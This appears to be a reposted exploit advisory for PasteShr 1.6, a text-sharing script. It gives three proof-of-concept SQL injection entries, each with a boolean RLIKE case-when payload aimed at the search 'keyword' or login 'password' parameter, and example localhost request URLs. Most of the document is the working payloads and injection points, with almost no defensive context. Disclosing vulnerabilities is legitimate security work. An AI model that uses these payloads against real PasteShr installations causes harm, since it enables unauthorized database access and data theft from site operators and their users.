PasteShr 1.6 SQL Injection From alphabanklog
PasteShr version 1.6 suffers from multiple remote SQL injection vulnerabilities.
Download
Code:
===========================================================================================
Exploit Title: PasteShr – SQL İnj.
Dork: N/A
Date: 14-05-2019
Exploit Author: Mehmet EMIROGLU
Vendor Homepage:Software Link:
https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
Version: v1.6
Category: Webapps
Tested on: Wamp64, Windows
CVE: N/A
Software Description: Pasteshr is a script which allows you to store any
text online for easy sharing.
The idea behind the script is to make it more convenient for people to
share large amounts of text online.
===========================================================================================
POC – SQLi
Parameters : keyword
Attack Pattern :
%27/**/RLIKE/**/(case/**/when/**//**/9494586=9494586/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/’%’=’
# GET Method : http://localhost/pasthr/public/search?keyword=4137548[SQL
Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
Exploit Title: PasteShr – SQL İnj.
Dork: N/A
Date: 14-05-2019
Exploit Author: Mehmet EMIROGLU
Vendor Homepage:
# Software Link:
https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
Version: v1.6
Category: Webapps
Tested on: Wamp64, Windows
CVE: N/A
Software Description: Pasteshr is a script which allows you to store any
text online for easy sharing.
The idea behind the script is to make it more convenient for people to
share large amounts of text online.
===========================================================================================
POC – SQLi
Parameters : password
Attack Pattern :
/**/RLIKE/**/(case/**/when/**//**/6787556=6787556/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)
# POST Method :
http://localhost/pasthr/public/logi…aFAfeZfi2c&email=2270391&password=6195098[SQL
Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
Exploit Title: PasteShr – SQL İnj.
Dork: N/A
Date: 14-05-2019
Exploit Author: Mehmet EMIROGLU
Vendor Homepage:Software Link:
https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
Version: v1.6
Category: Webapps
Tested on: Wamp64, Windows
CVE: N/A
Software Description: Pasteshr is a script which allows you to store any
text online for easy sharing.
The idea behind the script is to make it more convenient for people to
share large amounts of text online.
===========================================================================================
POC – SQLi
Parameters : keyword
Attack Pattern :
%27/**/RLIKE/**/(case/**/when/**//**/8266715=8266715/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/’%’=’
# POST Method :
http://localhost/pasthr/server.php/search?keyword=1901418[SQL Inject Here]
===========================================================================================
Click to expand…